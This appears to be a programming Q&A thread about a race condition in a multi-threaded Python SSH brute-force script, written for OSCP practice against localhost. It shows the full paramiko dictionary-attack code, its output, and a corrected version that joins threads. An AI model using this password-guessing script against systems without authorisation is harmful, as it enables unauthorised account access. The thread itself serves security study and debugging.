# Python threads closing out of order

Tags: python-3.x, multithreading, paramiko

So I have a multi-threaded `Python 3.7` script for a project that is trying to brute force port 22 on my local machine (prepping to the OSCP exam).

The script uses a dictionary attack to brute force the port.

The problem I have is when the script prints out each attempt at either successful or fails. At the end it should stop and the last valie or set of values are those added to the `found` list.

What actually happens is that the correct password is printed and then another of the failed passwords after it. Which one depends on howmany threads are running.

I assume this is to do with the way I am handling the threads but I can't figure out what I'm doing wrong.

```
import paramiko
import threading
from queue import Queue

TARGET_IP = 'localhost'
USERNAME = 'targetuser'
WORDLIST = 'test2.txt'
MAX_THREADS = 20
found = []
q = Queue()


def ssh_connect(target_ip, username, password):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy)

    try:
        ssh.connect(target_ip, username=username, password=password)
        found.append(password)
        q.put(password)
    except paramiko.ssh_exception.AuthenticationException:
        print("[*] Failed: ", password)
        return False
    finally:
        ssh.close()

    return True


def main():
    with open(WORDLIST) as input_handle:
        threads = []
        thread_count = 0
        for line in input_handle:
            try:
                password = line.rstrip()
                t = threading.Thread(target=ssh_connect, args=[TARGET_IP, USERNAME, password])
                threads.append(t)
                t.start()
                thread_count += 1

                if not q.empty():
                    break
                if thread_count >= MAX_THREADS:
                    for t in threads:
                        t.join()
                    thread_count = 0

            except KeyboardInterrupt:
                break

        if not q.empty() and len(found) > 0:
            for c in found:
                print("[!] Found: ", c)
        else:
            print("[*] Pass not found")


if __name__ == '__main__':
    main()
```

Output:

```
python3 ssh_brute.py 
[*] Failed:  josa10
[*] Failed:  josa0823
[*] Failed:  josa123
[*] Failed:  josa070601
[*] Failed:  josa004
[*] Failed:  josa13
[*] Failed:  josa0119
[*] Failed:  josa-jones
[*] Failed:  josa0131
[*] Failed:  josa12
[*] Failed:  josa08
[*] Failed:  josa16
[*] Failed:  josa122387
[*] Failed:  josa04
[*] Failed:  josa-young
[*] Failed:  josa02
[*] Failed:  josa-a
[*] Failed:  josa143
[*] Failed:  josa15
[!] Found:  super_secret_password
[*] Failed:  josa1856
```

Corrected code based on answer below:

```
def main():
    with open(WORDLIST) as input_handle:
        threads = []
        thread_count = 0
        for line in input_handle:
            try:
                password = line.rstrip()
                t = threading.Thread(target=ssh_connect, args=[TARGET_IP, USERNAME, password])
                threads.append(t)
                t.start()
                thread_count += 1

                if not q.empty():
                    break
                if thread_count >= MAX_THREADS:
                    for t in threads:
                        t.join()
                    threads = []
                    thread_count = 0
            except KeyboardInterrupt:
                break

        for t in threads:
            t.join()

        # if not q.empty() and len(found) > 0:
        if len(found) > 0:
            for c in found:
                print("[!] Found: ", c)
        else:
            print("[*] Pass not found")
```

Comment: Why does it matter? Threaded code is expected to execute in indeterminate order. The successful thread could easily not write its result until after the next thread is launched, or the thread before it might take longer than expected (for whatever reason) and finish after it.

Comment: Obviously it's not a show stopper. I was just wondering if it was part of the expected behaviour or was a bug in my code

Answer (score 2, accepted):

There are a couple of issues here:

1) The code checks for `q` being empty immediately after starting the thread.  The thing is, there is no way to know when the thread will run and if it will put a matching password in the `q` before you get to that check - in fact, there's a good chance it won't.

2) The MAX_THREADS loop should probably actually empty the array. `threads = []`

3) Add another loop to join the running threads outside of the for loop.  This will ensure that all of the threads complete before the code checks for the result. (EDIT:) This will have all of your failed messages print before the success message is printed.

Keep in mind that starting a thread is (in most languages) a way of having the function run at the same time as the currently running function that starts the thread.  So the timing can get very funky.  What you're seeing is generally seen as a "race condition".  Most you can fix.  Others...well...

Comment: Throwing in the `join` seems to have done the trick. Cheers dude